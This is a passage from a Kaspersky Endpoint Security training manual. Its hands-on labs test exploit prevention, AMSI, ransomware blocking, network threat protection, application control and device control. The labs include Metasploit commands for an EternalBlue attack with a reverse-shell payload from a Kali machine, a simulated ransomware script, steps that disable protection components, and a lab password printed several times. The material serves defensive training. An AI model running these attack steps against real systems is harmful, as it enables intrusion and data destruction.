15. Click Send to dispatch the message
L–53
Lab 8.
Switch to Tom-Laptop.
16. Open Microsoft

Outlook
17. Select the received
message
18. Open the link from the
message in a browser
19. Save the file to the
computer
20. In the warning window, click Run
21. Open the Metasploit Framework console.

22. Make sure that a new session has been opened
23. Connect to the created session. Carry out the following command:
sessions 1
where 1 is the number of the recently created session
24. You have got full remote access to the Tom-Laptop machine
25. Run Command Prompt. Carry out the following command:

shell
Then you can carry out the whoami command to get the name of the active user
whoami
Task B: Disable most of the protection components
In this task, you will disable most of the Kaspersky Endpoint Security protection components.

26. Open Kaspersky

Security Center Web
Console
& Profiles
28. Open the policy
Kaspersky Endpoint
(11.1.0)
29. Switch to the

tab
30. Disable the following
protection components:
– KSN
– Behavior
Detection
31. Switch to Essential
Threat Protection
32. Disable the following
protection components:
– File Threat
Protection
– Web Threat
Protection
– Mail Threat
Protection
33. Click Save to save

the policy settings.
Confirm that you want
to use the specified
settings: Click Yes
applied
L–55
Lab 8.
Task C: Test protection against exploits
In this task, you will enable the Exploit Prevention component and test it.

The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on.
35. Close the web browser window

36. !Restart the Tom-Laptop computer
37. Log on to the system
38. Open the main window of Kaspersky Endpoint
Security
39. Click in the Protection components area
40. Make sure that the Exploit Prevention
component is enabled
41. Go to the Downloads directory

42. Run the *.hta file
43. Note that a script run error has occurred

44. In the Script Error window, click No
45. Open Kaspersky Endpoint Security reports

46. Switch to the report of the Exploit Prevention
component
47. Make sure that the exploit was detected

49. Open the Metasploit console
50. Carry out the following command:
sessions
51. Note that there are no active sessions on the criminal’s
computer
Conclusion
In this lab, we made sure that the multitier defense system of Kaspersky Endpoint Security permits repelling advanced threats
even when the main protection components are disabled.
Lab 9.
How to test protection against fileless threats
Scenario. Recently, a new threat vector has become popular, which uses PowerShell, a powerful operating system
administration and management tool. Criminals can run their code in the address space of the PowerShell process. A fileless
attack is hard to detect since malicious code is executed in the memory, unlike an ordinary virus that stores its files on the local
drive. Typically, attacks via PowerShell are performed after the machine has been compromised using other malicious actions,
usually, exploitation of software vulnerabilities.
Contents. In this lab, we will disable KSN and test how antimalware scan interface (AMSI) detects fileless threats.
L–57
Lab 9.
How to test protection against fileless threats
Make sure that AMSI detects fileless threats

1. Open c:\temp
2. Unpack the bsstest_amsi archive
3. Enter the password infected
4. Press WIN+R
5. Type powershell
6. Click OK
7. Go to the directory of the unpacked script. Carry out

cd c:\temp\bsstest_amsi\bsstest_amsi
8. Run the test PowerShell script. Carry out the following command:
.\bsstest_amsi.ps1
9. Make sure that Kaspersky Endpoint Security blocks the script


11. Select AMSI Protection Provider
12. Make sure that Kaspersky Endpoint Security has
detected and neutralized the threat
Conclusion
You’ve made sure that even if some of the protection components are disabled, Kaspersky Endpoint Security can efficiently
interact with the script interpreters built into Microsoft Windows operating systems to detect and block malicious code.
Lab 10.
Improve workstations’ protection against
ransomware
Center. Of all threats, you are most concerned about crypto ransomware. If Kaspersky Endpoint Security fails to detect a new
malware version one day, the company will lose much money. To decrease the risk, configure Host Intrusion Prevention to
prohibit all programs except for trusted from editing documents on the computers.
1. Simulate a ransomware infection

2. Prohibit all programs except for trusted from editing and deleting documents
3. Configure Host Intrusion Prevention events to be stored on the Administration Server
4. Simulate encrypting a document and check the result
Task A: Simulate a ransomware infection
Find the ransomware.bat script on the desktop of the Tom-Laptop computer and run it. It is designed to encrypt text
documents and delete the original files.
L–59
Lab 10.
Improve workstations’ protection against ransomware

1. Find the ransomware.bat and invoice.txt files on the

desktop
2. Run the ransomware.bat file
3. Make sure that the invoice.txt file has gone, and the
invoice.txt.aes file has appeared instead
4. Open the invoice.txt.aes file in Notepad
5. Make sure that the invoice.txt.aes file is encrypted
6. Close Notepad
Task B: Prohibit all programs except for trusted from editing and deleting
documents
Open the Host Intrusion Prevention settings in the Kaspersky Endpoint Security policy. Find the list of protected resources.
Create a Documents category. Add files with the *.txt extension to it. Prohibit all programs except for trusted from editing,
deleting, and creating files of this category.

The DC, Tom-Laptop, and Alex-Desktop machines must be powered on.
7. Open Kaspersky
Security Center Web
Console
& Profiles
9. Open the policy
Kaspersky Endpoint
(11.1.0)
10. Switch to the

Application settings
tab
Protection, select Host
12. Enable Host Intrusion

Prevention
13. To open the list of
rights, click the link
Application rights and
protected resources
14. To create a new

category, in the left
pane, click Add
15. Select Category of

protected resources
16. Type Protected Files
for the category name
17. Click the Operating
system link
18. Select the Personal

data subcategory
19. Click OK twice
L–61
Lab 10.
20. To create a subcategory,

in the left pane, click
Add
21. Select Category of

protected resources
22. Specify Documents for
the name
system link
24. Specify the Protected

Files subcategory
25. Click OK twice
26. Add file types to the

category. In the left
pane, click Add
27. For the resource type,

select File or folder
28. In the Path box, enter
*.txt, and in the Display
name field, type txt
system link
30. Specify the Documents

subcategory
31. Click OK twice
32. Specify rights for the

created category: Select
the category Personal
data | Protected files |
Documents | *.txt
33. Click the *.txt row
34. Prohibit applications
that have Low and High
Restricted reputation
from editing the files
belonging to this
category: Change the
action for Write,
Delete, and Create
operations to Block
35. Configure Host Intrusion Prevention to log attempts to edit documents. Enable Log events for the Write, Delete, and
Create actions
36. Click OK twice to save the access rights
37. Click Save to save the policy
38. Wait for the policy to be enforced
L–63
Lab 10.
Task C: Configure Host Intrusion Prevention events to be stored on the

Administration Server
Open event settings in the policy. Find information events of Host Intrusion Prevention: Application placed in restricted
group and Application privilege control rule triggered. Configure the policy to store these events on the Administration
Server.

39. Open Kaspersky

Security Center
MMC Console
40. Open the
Kaspersky
Endpoint Security
for Windows policy
41. Switch to the Event configuration section and open the Info
tab
42. Click the Event type header to sort the list alphabetically and
select the event Application placed in restricted group
43. Open the event’s properties: Click the Properties button below
the list
44. Configure storing the event in the Administration Server

database: Select On Administration Server for (days) and
click OK
45. Select the event Host Intrusion Prevention was triggered

and click Properties
46. Configure storing the event in the Administration Server

database: Select On Administration Server for (days) and
click OK
47. Click Save to save the policy
48. Wait for the policy to be enforced
L–65
Lab 10.
49. Open the web console

50. Switch to the
Monitoring &
Reporting | Event
Selections tab
51. To create a new event
selection, click Add
52. Type Host Intrusion

Prevention events for
the selection name
53. Switch to the Events

section
54. In the Application name
list, select Kaspersky
Endpoint Security
55. Select the Severity
Level Info
56. Select the Include
general events check
box
57. On the list of events,
select
— Application
placed in
restricted group
— Host Intrusion
Prevention was
triggered
58. Click Save
Task D: Simulate encrypting a document and check the result
Find the ransomware.bat script on the desktop of the Alex-Desktop computer and run it. It is designed to encrypt text
documents and delete the original files. Make sure that the script cannot delete the text file this time.
Consult the Host Intrusion Prevention events on the Administration Server. Make sure that it was Host Intrusion Prevention
that did not allow the script to delete the text document.

The DC, Tom-Laptop, and Security-Center machines must be powered on.
59. Find the ransomware.bat and invoice.txt files on the desktop

60. Run the ransomware.bat file
61. Make sure that the invoice.txt.aes file has appeared on the desktop, but the invoice.txt file has not been deleted
62. Switch to the Security-

Center computer
63. Open Kaspersky
Security Center Web
Console
64. Switch to the
Monitoring &
Reporting | Event
Selections tab
65. Tick the Host intrusion
prevention events
selection
66. Click Start to display
the event selection
67. Study the events in the

selection. Make sure
that it was Host
that did not allow the
program to delete the
document
Conclusion
You have configured Host Intrusion Prevention to allow only trusted programs to edit text documents. To properly protect
against ransomware, add more document types to the category: *.doc, *.docx, *.xlsx, etc.
Programs by known vendors, such as Microsoft Office, are trusted, and Host Intrusion Prevention will not restrict them.
Ransomware, even new that has not yet been added to the signature database or KSN, will never get in the trusted category and
will not be able to edit documents.
L–67
Lab 11.
How to test Network Threat Protection
Lab 11.
Center. You scan your network periodically with a special security scanner to find out whether the computers are properly
shielded. Kaspersky Endpoint Security blocks attacks on the scanned computers and then blocks any connections from the
attacking computer for an hour. Add the computer from which you perform vulnerability scanning to the list of exclusions.
1. Imitate a network attack from Kali on Alex-Desktop

2. Study the Network attack report
3. Unblock the Kali computer
4. Configure the Network Threat Protection not to block Kali
5. Imitate an attack from Kali on Alex-Desktop and study the results
Task A: Imitate a network attack from Kali on Alex-Desktop
On the Kali computer, run the Metasploit Framework penetration utility. Perform an Eternalblue attack.
EternalBlue exploits a vulnerability in Server Message Block (SMB) v1 protocol. A criminal can generate a specially prepared
package, transfer it to a remote computer, thus get remote access to the system, and run any code there.
The task is performed on Kali.


2. Run the terminal
3. Start the Metasploit Framework console. Carry out the following command:
msfconsole
4. Select the exploit template. Carry out the following command:

use exploit/windows/smb/ms17_010_eternalblue
5. Specify the malicious payload. Carry out

set payload generic/shell_reverse_tcp
6. Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50
7. Specify the address of the victim machine. Carry out the following command:
set RHOST 10.28.0.100
8. Activate the exploit. Carry out

exploit
Note that you cannot exploit the vulnerability
The attack fails because Kaspersky Endpoint Security blocks network attacks by default.
Task B: Study the Network attack report
Find the list of reports in the Administration Console. Create a new template for the Network attack report. Generate the
report, consult the details of the network attack, find the addresses of the attacking and attacked machines.

9. Open Kaspersky
Security Center Web
Console
10. Switch to the
Monitoring &
Reporting | Reports
tab
11. Click Add
12. Name the report

Network attack report
13. Under Statistics of
threats, select Report
on network attacks
14. Click Next
L–69
Lab 11.
15. Click Next
16. Select to include

information over the last
30 days
17. Click OK
18. In the message box,

click Save and run
19. Switch to the Details

tab
20. Find the IP address of

the attacking computer
and DNS name of the
attacked machine in the
report
21. Close the report
22. Switch to the Event

Selections tab
new event selection
24. Name the selection

Network attacks
25. Switch to the Events

section
26. In the Application
name field, select
Kaspersky Endpoint
27. For the Severity level,
choose Critical
28. Select the check box
Include general events
L–71
Lab 11.
29. On the list of events,

find and select the
Network Attack
detected event
event selection
31. In the message box, tick

Go to selection result
and click Save
32. Study the events in the

selection
Task C: Unblock the Kali computer
Open Kaspersky Endpoint Security on the attacked computer. Use the shortcut menu of the Firewall component to open
Network Monitor. Find the list of blocked computers and unblock the Kali computer.

The DC, Security-Center, Tom-Laptop, and Kali machines must be powered on.
33. Open Kaspersky Endpoint Security interface:

Click its icon in the notification area
34. Click in the Protection components area
35. At the bottom of the window, click Network

Monitor
36. The Network Monitor window will open

L–73
Lab 11.
37. Switch to the Blocked computers tab

38. Unblock the Kali computer: Select address
10.28.0.50 and click Unblock
39. Close all Kaspersky Endpoint Security
windows
Task D: Configure exclusions in the properties of Network Threat Protection
In the Kaspersky Endpoint Security policy, open the Network Attack Blocker settings. Find the list of trusted computers and
add the IP address of the Kali computer (10.28.0.50) to it.

The DC, Kali, Alex-Desktop, and Tom-Laptop machines must be powered on.
40. Open Kaspersky

Security Center Web
Console
& Profiles
42. Open the policy
Kaspersky Endpoint
(11.1.0)
43. Switch to the

tab
44. Open the Essential
Threat Protection
section
45. Click the link Network
Threat Protection
46. Open the list of trusted

computers: Click the
link Exclusions
47. Click Add to specify a

device
48. Type the IP address of

the Kali computer,
10.28.0.50, and click
OK
49. Click OK
policy
enforced
Task E: Imitate an attack from Kali on Alex-Desktop and study the results
Simulate another attack on the computer Alex-Desktop from Kali using Metasploit Framework. Make sure that Kaspersky
Endpoint Security does not react to this attack anymore.
The task is performed on Kali.

The DC, Security-Center, Alex-Desktop, and Tom-Laptop machines must be powered on.

53. Open a Terminal window
54. Activate the exploit again. Carry out the following command:
exploit
55. Make sure that you have exploited the vulnerability in SMB protocol
L–75
Lab 12.
How to configure exclusions from self-defense
56. Display the list of directories. Carry out the following command:
dir
Conclusion
You have configured Network Threat Protection not to react to attacks from the specified IP address. You can use this method
to exclude addresses of network security scanners.
Also, you have created a new report and a new event selection. There are many types of reports in Kaspersky Security Center.
If the pre-configured reports available on the Reports tab are insufficient, have a look at the complete list of reports that you
can create.
If none of them yet meets your needs, create a selection of events that interest you. Configure conditions: Event types, time,
group of computers, etc.
Lab 12.
Center. To remotely help employees, you connect to their machines through Windows Remote Assistance. However,
Kaspersky Endpoint Security does not react to your actions via Windows Remote Assistance. Make an exclusion for Windows
Remote Assistance to be able to manage Kaspersky Endpoint Security remotely.
1. Try to interact with Kaspersky Endpoint Security via Windows Remote Assistance
2. Allow Windows Remote Assistance to interact with Kaspersky Endpoint Security
3. Open the local report of Kaspersky Endpoint Security in a Windows Remote Assistance session
Task A: Try to interact with Kaspersky Endpoint Security via Windows

Remote Assistance
Run Windows Remote Assistance on Alex-Desktop, remember the ID and password. Run Windows Remote Assistance on
Tom-Laptop and connect to Alex-Desktop. Open Kaspersky Endpoint Security interface. Try to open the Reports window.
The task is performed on Alex-Desktop at first.

1. Run Outlook
2. Press WIN+R
3. Type msra in the field
4. Click OK
5. Select the option Invite someone you trust to help you
6. Select Use e-mail to send an invitation
7. Specify the addressee. In the To: box, type [email protected]

8. Click Send
L–77
Lab 12.
9. Write down the remote connection password

account. Password—
Ka5per5Ky
11. Run Outlook
12. In the Inbox, open the
message from
[email protected]
13. Click the attached file
Invitation.*
14. Click Open
15. Type the remote connection password (see step 8)
16. Allow Tom to connect to your workstation. In the window that opens,
click Yes
17. Click Request control

in the upper-left corner
of the window
18. Allow Tom to manage your workstation. In the window that opens,
click Yes
19. Open Kaspersky

Endpoint Security
interface
20. Make sure that you
cannot manage
Kaspersky Endpoint
Security remotely
L–79
Lab 12.
Task B: Allow Windows Remote Assistance to interact with Kaspersky

Endpoint Security
Open the policy of Kaspersky Endpoint Security. Find the list of trusted programs. Add the msra.exe file to the list of trusted
applications. Allow it to interact with the Kaspersky Endpoint Security interface.

21. Open Kaspersky

Security Center Web
Console
& Profiles
23. Open the policy
Kaspersky Endpoint
(11.1.0)
24. Switch to the

Application Settings tab
Settings section
26. Open the list of
exclusions: Click the
Exclusions link
27. To add a trusted

application, click the
link Trusted
applications in the
lower-left corner of the
window
28. To specify the service

process of Microsoft
Remote Assistance, click
the Add button
29. In the Path box, type

%systemroot%\system32
\ msra.exe
30. Clear the following checkboxes:

– Do not scan opened files
– Do not inherit restrictions of the parent process (application)
31. Allow Windows Remote Assistance to interact with KES interface: Select the check box Do not block interaction
with the application interface and click OK
32. To save the list of

applications, click OK
policy
enforced
Task C: Open the local report of Kaspersky Endpoint Security in a Windows

Remote Assistance session
Use Windows Remote Assistance to connect from Tom-Laptop to Alex-Desktop. Open the Reports window in Kaspersky
Endpoint Security.

35. Open Kaspersky

Endpoint Security
reports: Click the
Reports button
36. Close all Kaspersky
Endpoint Security
windows
37. Close all Windows
Remote Assistance
windows
Conclusion
You have allowed a remote access application to interact with Kaspersky Endpoint Security interface.
L–81
Lab 13.
How to configure password protection
Lab 13.
Center. To prevent the users from disabling the protection, prohibit managing Kaspersky Endpoint Security and Network
Agent without a password.
1. Find a computer where protection is off

2. Set a password for local management of Kaspersky Endpoint Security
3. Set a password for Network Agent uninstallation
Task A: Find a computer where protection is off
On Tom-Laptop, exit Kaspersky Endpoint Security.
Find the message informing that protection is disabled on some computers on the Monitoring page. Go to the selection of
computers where protection is off. Open the computer properties, find the Kaspersky Endpoint Security application and start it.

1. Log on to the abc\Tom account. Password—Ka5per5Ky

2. Exit Kaspersky Endpoint Security using the shortcut menu of its icon
Switch to the Security-Center computer.
3. Log on to the
abc\Administrator
account with the
password Ka5per5Ky
4. Open Kaspersky
Security Center Web
Console
5. Switch to the
Monitoring &
Reporting | Dashboard
tab
6. Note that one of the
devices has the Critical
protection status
7. Click the Critical link
to consult the list of
devices that have this
status
8. Make sure that

protection is not running
on Tom-Laptop
9. Open the device
properties: Click the
link Tom-Laptop
10. Switch to the

Applications tab
11. Select Kaspersky
Endpoint Security and
click Start
12. Close the computer

properties and get back
to Monitoring &
reporting | Dashboard
13. Note that the protection
status has changed from
Critical to OK
Task B: Protect Kaspersky Endpoint Security with a password
In the policy of Kaspersky Endpoint Security for workstations, find password protection among the Interface settings. Enable
password protection and apply it to critical operations with Kaspersky Endpoint Security.
On the Tom-Laptop computer, try to exit Kaspersky Endpoint Security. Make sure that you cannot exit the application without
the password. Try to uninstall Kaspersky Endpoint Security through the Windows Control Panel. Make sure that this operation
is also password-protected.

14. Open Kaspersky

Security Center Web
Console
& Profiles
16. Open the policy
Kaspersky Endpoint
(11.1.0)
L–83
Lab 13.
17. Switch to the

tab
18. Open General Settings
| Interface
19. Click the Password

protection DISABLED
switcher
20. Enter the password

Ka5per5Ky
21. Click OK
22. Click Add to specify a

user
23. Click the link Select

user
24. In the search box, type

alex
25. Choose the Alex
account
26. Click Select
27. Tick the following

operations:
– Configure
application
settings
– Remove / modify /
restore the
application
– Disable Kaspersky
Security Center
policy
– Exit the
application
28. Click OK
L–85
Lab 13.
29. Make sure that the Alex

user has been added to
the list
30. Click OK to save the
changes
31. Save the policy: Click

Save and Yes
applied
Task C: Make sure that Kaspersky Endpoint Security is password-protected
Make sure that you need to enter credentials to perform some actions within the program.


34. Try to exit KES using the shortcut menu of its icon in the taskbar
35. In the Password check window, enter the abc\Alex account and
password Ka5per5Ky
36. Make sure that the application has been closed successfully
37. Open Programs and Features

38. Select Kaspersky Endpoint Security for
Windows
39. Make sure that the Uninstall button is not
available
Task D: Set a password for Network Agent uninstallation
Open the Network Agent policy and find the password protection settings there. Enable password protection, type a password
and make these settings required; meaning, prohibit users from modifying them.
On the Tom-Laptop computer, try to uninstall the Network Agent. Do not enter the password and make sure that you cannot
uninstall Network Agent without it.

40. Open Kaspersky

Security Center Web
Console
& Profiles
42. Open the policy of
Kaspersky Security
Center Network Agent
L–87
Lab 13.
43. Switch to the

tab
44. Enable password
protection in the
Settings section: Select
to Use uninstall
password
45. Enter the password
Ka5per5Ky
46. Enforce the Use
uninstall password
settings (lock editing)
and click Save
applied
48. Open Programs and Features

49. Select Kaspersky Security Network Agent
50. Click Uninstall to try to remove it
51. In the Windows information window, confirm
that you want to uninstall the application
52. On the welcome page of the uninstall wizard,

click Next
53. Click Next without entering a password
54. Make sure that Network Agent cannot be

uninstalled without the password
55. Click OK to close the error message
56. Click Cancel to exit the wizard
57. Confirm that you want to exit: Click Yes
58. Click Finish to close the wizard
Conclusion
You have enabled password protection for Kaspersky Endpoint Security and Network Agent. Now the users cannot uninstall
Kaspersky Lab applications, exit Kaspersky Endpoint Security, or stop protection.
Neither can they stop the service or process of Kaspersky Endpoint Security. Kaspersky Endpoint Security self-defense
prevents this.
To hide the fact that Kaspersky Endpoint Security is installed on the computer from the users, select not to display KES icon in
the notification area. This setting is located in the Interface section of Kaspersky Endpoint Security policy.
Lab 14.
How to configure Application Control
Scenario. You are an administrator at ABC Inc. whose network is protected with Kaspersky Endpoint Security. It is managed
via the Kaspersky Security Center.
According to the corporate security policy, Internet Explorer is the only allowed web browser. All available security updates
are downloaded for it on a regular basis, while the updates of other browsers are not. Considering the fact that malware
typically penetrate a network through browsers today, the decision to prohibit all other browsers was made.
Your task is to enforce the security policy requirements. You need to block all browsers except for Internet Explorer using
Application Control.
1. Create a category for all web browsers except Internet Explorer

2. Prohibit the users from starting any web browsers except for Internet Explorer
3. Start Mozilla Firefox and Internet Explorer
L–89
Lab 14.
Task A: Create a category for all web browsers except Internet Explorer
Create an application category that includes all browsers except for Internet Explorer 11.0 or later. To add all browsers, use
Kaspersky Lab (KL) categories. To exclude Internet Explorer, use the metadata of the iexplore.exe file.

1. Open Kaspersky
Security Center Web
Console
2. Open the Operations
tab. On the Third-party
applications drop-down
menu, click
Application categories
3. To create a new
category, click Add
4. Specify Browsers for

the category name
5. For the category
creation method, select
Category with content
added manually
6. Click Next
7. To specify a new
condition for the
category, click Add
8. Select From KL
category
9. Click Next
10. Select the category

Browsers | Web
Browsers
11. Click Next
12. Click Next
13. Specify exclusions.

Click Add
14. On the list of exclusion

conditions, choose
Hash, metadata, or
certificate
15. On the drop-down list,
select From file or
from MSI package
16. Click Next
17. Click Browse

18. In the window that
opens, select the
iexplore.exe file from
Alex-Desktop
(\\Alex-Desktop\c$\
Program Files\Internet
Explorer\iexplore.exe)
19. Click Next
L–91
Lab 14.
20. Switch the condition to

Metadata
21. In the File version
drop-down list, select
Greater than or equal
to
22. In the Application
version drop-down list,
select Greater than or
equal to
23. Click Next
24. Click OK
25. To confirm creating the

Browsers category,
click OK
Task B: Prohibit the users from starting any browsers except for Internet
Explorer
Open the Application Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable
Application Control and select the Block mode instead of Notify.
Add a rule that prohibits starting programs of the Browsers category that you created in the previous task.

26. Open Kaspersky

Security Center Web
Console
& Profiles
28. Open the policy
Kaspersky Endpoint
(11.1.0)
29. Switch to the

tab
30. Open the Security
Controls section
31. Select the Application
Control component
32. Enable the Application

Control component
33. Disable the Test Mode
34. Click the link Rules
Lists Settings
35. Add a category to the

black list. Click Add
L–93
Lab 14.
36. Click the link Category

is not defined
37. Select the Browsers

category
38. Click OK

Browsers category is
blocked for all users
40. Click OK
41. Enable this category if it

has not been enabled
automatically
42. Click OK
Save and Yes
applied
Task C: Start Mozilla Firefox and Internet Explorer
Make sure that the users are able to launch Internet Explorer but not Mozilla Firefox.


46. Run the Mozilla Firefox browser
47. Note that Kaspersky Endpoint Security blocks

Firefox and informs the user about it
49. Run the Internet Explorer browser

50. Make sure that Kaspersky Endpoint Security
does not block Internet Explorer
Conclusion
If you need to allow or prohibit a group of programs, Kaspersky Lab categories come in very handy. The categories are
updated when database updates are run, and you can feel confident that the latest versions of popular browsers are added and
applied automatically.
When setting up Application Control, remember: Rules configured to deny access will always have a higher priority than ones
that allow access. For this reason, if you need to prohibit a program category except for a few applications, you will need to
create a rule to block access and add exclusions for the allowed applications, which was demonstrated in this lab. Any other
configuration will not work.
L–95
Lab 15.
How to block start of unknown applications in the network
Lab 15.
How to block start of unknown applications in
the network
via the Kaspersky Security Center. Application Control, as well as Host Intrusion Prevention, can decrease the risk of
becoming infected by new malware. Let us configure Application Control to block start of all files except for trusted within
specific operating system directories.
1. Create an application category that prohibits starting unknown files

2. Change the policy so as to prohibit all users from starting unknown files
3. Make sure that the settings work correctly
Task A: Create an application category that prohibits starting unknown files
In this task, you will create an application category for crypto ransomware.

1. Open Kaspersky
Security Center Web
Console
2. Open the Operations
tab. On the Third-party
applications drop-down
menu, select
Application categories
3. Create a new category.

Click Add
4. Type Protection
Cryptomalware for the
category name
5. For the category
creation method, select
Category with content
added manually
6. Click Next
7. To create a condition,
click Add
8. Copy the
Conditions_Protection_Cryptomalware.txt file to
your desktop. Ask the trainer where to find the file
9. Open the file
Conditions_Protection_Cryptomalware.txt in
Notepad
10. Select Specify path to

application (masks
supported)
11. Click Next
12. Select and copy the first

line from the file
Conditions_Protection
_Cryptomalware.txt
13. Paste the copied line
and click Next
14. Click Add to include

the other values
15. In a similar manner, add

all other paths from
Conditions_Protection
_Cryptomalware.txt
16. Click Next
L–97
Lab 15.
17. Specify exclusions.

Click Add
18. Select From KL

category
19. Click Next
20. Select all KL categories

21. Click Next
22. Click OK
23. Confirm creating the

category. Click OK
Task B: Change the policy so as to prohibit all users from starting unknown
files
Open the Application Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable
Application Control and select the Block mode instead of Notify.
Add a rule that prohibits starting programs of the Protection Cryptomalware category that you created in the previous task.

24. Open Kaspersky

Security Center Web
Console
& Profiles
26. Open the policy
Kaspersky Endpoint
(11.1.0)
27. Switch to the

tab
Controls section
Control component
L–99
Lab 15.
30. Click the link Rules

Lists Settings
31. Click Add
32. Click the link Category

is not defined
33. On the list of categories,

select Protection
Cryptomalware
34. Click OK
35. Click OK
36. Click OK
37. Click OK
Save and Yes
applied
Task C: Make sure that the settings work correctly
In this task, you will make sure that Kaspersky Endpoint Security blocks start of unknown files.


41. Double-click ransomware.bat to run it
L–101
Lab 15.
42. Note that KES blocks ransomware.bat and

displays the corresponding notification
44. Open Kaspersky

Security Center Web
Console
& Profiles
46. Open the policy
Kaspersky Endpoint
(11.1.0)
47. Switch to the

tab
Controls section
Control component
50. Disable the Application

Control component
51. Click OK
policy
enforced
Conclusion
This lab demonstrates how the administrators, by properly configuring the product, can block the start of new and unknown
files on the endpoints. By doing so, they will limit the likelihood of an infection on the protected machines.
Lab 16.
How to block USB flash drives
Incident analysis has revealed that a bunch of computers had become infected through USB flash drives. The decision was
made to eliminate this penetration vector. Your task is to block access to all USB flash drives using Kaspersky Endpoint
Security on all workstations in ABC network.
Contents. In this lab, we will block access to USB flash drives.
Task A: Configure blocking USB flash drives
In this task, we will learn how to configure notifications for terminal users in the policy.
L–103
Lab 16.


Ka5per5Ky
2. Plug the USB flash drive
with the course handouts
into the host computer
3. On the menu of
VMware Workstation,
click VM, Removable
Devices, <your drive
type>, Connect
(Disconnect from Host)
4. On the Tom-Laptop computer, click Start,

Computer
5. Make sure that the USB flash drive has been
connected successfully
6. Open Kaspersky
Security Center Web
Console
& Profiles
8. Open the policy
Kaspersky Endpoint
(11.1.0)
9. Switch to the
tab
Controls section
11. Select the Device
Control component
12. Click the link Access

rules for devices and
Wi-Fi networks
13. Click the link

Removable drives
14. Note that access to
devices Depends on
bus
15. For the Access

parameter, select Deny
16. Click OK
L–105
Lab 16.
17. Make sure that access to

Removable drives is
set to Deny
18. Click OK
policy
enforced
Task B: Test blocking USB flash drives
In this task, we will try to access the device already connected to the computer.

22. Note that the USB flash drive is still shown

among Devices and drives
23. Open the USB flash drive

24. Note that despite the fact that the removable drive is visible, it is
inaccessible
25. Close the Windows message
26. Click Request access
27. Read the message

28. Click Send
Task C: Receive a request from the user
In this task, we will receive a USB drive access request from the user.

29. Open Kaspersky

Security Center Web
Console
30. Switch to the
Monitoring &
Reporting | Event
Selections tab
31. Select the checkbox
next to User requests
32. Click Start
L–107
Lab 17.
How to configure granular permissions for USB flash drives
33. Read the request
Conclusion
In this lab, we studied how to block access to removable drives. Aside from blocking access completely, you can also allow
access upon request or allow specific devices only. Typically, administrators will use this functionality to block the spread of
malware through removable drives on the network. This feature can also help to prevent data leakage.
Lab 17.
How to configure granular permissions for USB
flash drives
You have prohibited access to USB flash drives throughout the company. However, the measure turned out to be too
aggressive as some users need USB flash drives for work related tasks. The decision to allow all users to use encrypted USB
flash drives has been made at the company.
Now, we will allow the users to read and copy files from USB flash drives; add encrypted USB flash drives to trusted devices
and thus allow domain users to access them without limitations; and also configure logging operations with these USB flash
drives.
1. Prohibit all users from writing files to USB flash drives

2. Allow the domain users to write files to trusted USB flash drives
Task A: Prohibit all users from writing files to USB flash drives
Open the Device Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Enable the users
(Everyone) to read files from removable drives.


Ka5per5Ky
2. Plug the USB flash drive
with the course handouts
into the host computer
3. On the menu of
VMware Workstation,
click VM, Removable
Devices, <your drive
type>, Connect
(Disconnect from Host)
4. On the Tom-Laptop computer, click Start,

Computer
5. Make sure that the USB flash drive has been
connected successfully
6. Open Kaspersky
Security Center Web
Console
& Profiles
8. Open the policy
Kaspersky Endpoint
(11.1.0)
9. Switch to the
tab
Controls section
Control component
L–109
Lab 17.

Wi-Fi networks
13. Click the link

Removable drives
14. Note that access to
devices is set to Deny
15. Prohibit the users from

writing to removable
drives: Clear the Write
check box and click OK
16. Save the policy and wait
for it to be enforced
17. Open the USB flash drive

18. Copy any file from the flash drive to the desktop
19. Try to copy a file from the desktop to the USB flash drive
20. Make sure that Kaspersky Endpoint Security does not permit
copying to the flash drive
21. Close the Windows message
Task B: Allow domain users to write files to trusted USB flash drives
Open the Device Control settings in the Kaspersky Endpoint Security policy of the Workstations group. Make the removable
drive trusted for the Domain users group. Select to log events when users write files to USB flash drives.

22. Open Kaspersky

Security Center Web
Console
& Profiles
24. Open the policy
Kaspersky Endpoint
(11.1.0)
25. Switch to the

tab
Controls section
Control component
L–111
Lab 17.

Wi-Fi networks
29. Click the link

Removable drives
30. Open the Logging tab

31. Enable Logging
32. Click the Add button at

the bottom of the
window to specify a
user group
33. Type everyone and

click the magnifying
glass icon
34. Choose the Everyone
group
35. Click Select
36. Click OK
L–113
Lab 17.
37. Click the link Trusted

devices
38. Make the removable

drive trusted: Click Add
device by ID
39. On the list of devices,

select Generic Flash
Disk USB Device
40. Click Next
41. Select the Domain

Users group
42. Click Next
43. Click OK

device has become
trusted for the Domain
Users group
45. Click OK
46. Switch to the

tab
Settings section
48. Click Interface
49. In the Notifications

area, click the
Notification rules link

Control component
51. Select to Save in local
log the File operation
performed events and
click OK
policy
enforced
L–115
Lab 18.
How to configure web access control
54. Copy the invoice.txt file from the desktop to the USB flash drive
55. Make sure that Kaspersky Endpoint Security allows you to write files to a trusted device
56. Open Kaspersky

Security Center Web
Console
57. Switch to Monitoring
& Reporting. Open the
Reports tab
58. Select the Report on
file operations on
removable drives
59. Click Show report
60. Switch to the Details

tab. Make sure that the
report informs that the
ABC\Tom user saved
the invoice.txt file to a
removable drive
Conclusion
In this lab, we studied how to control user access rights to USB flash drives along with making exclusions for specific drive
types. There are always users at a company (secretaries, for example) who need to copy data to/from various USB flash drives
whose model and serial number are usually not known in advance.
Others (like administrators, for example) typically have this information readily available. You can configure exclusions for
these drives. The policy provides for flexible adjustments: You can create a list of specific USB flash drives that are to be
accessible, and specify users and/or groups who use them.
Lab 18.
Scenario. You are an antivirus security administrator at ABC Inc. whose network is protected with Kaspersky Endpoint
Security. It is managed via the Kaspersky Security Center. When analyzing the company’s internet traffic, you have found that
many users visit cryptocurrency exchange websites during business hours. Based on this information, you would like to
prohibit that by setting up a policy to specifically block access to the respective content category.
Contents. In this lab, we will block access to cryptocurrency exchange websites.
Task A: Create a rule to block access to cryptocurrency exchange websites
In this task, we will configure the policy to block access to cryptocurrency exchange websites for all users during business
hours.

1. Open Kaspersky
Security Center Web
Console
& Profiles
3. Open the policy
Kaspersky Endpoint
(11.1.0)
4. Switch to the
tab
Controls section
6. Select the Web Control
component
7. Click Add
L–117
Lab 18.
8. In the Rule name field,

type Cryptocurrencies
9. For the Action, select
Block
10. Select the By content
categories checkbox
11. Click the link Content
categories
12. On the Content

categories list, under
Online stores, banks,
payment systems,
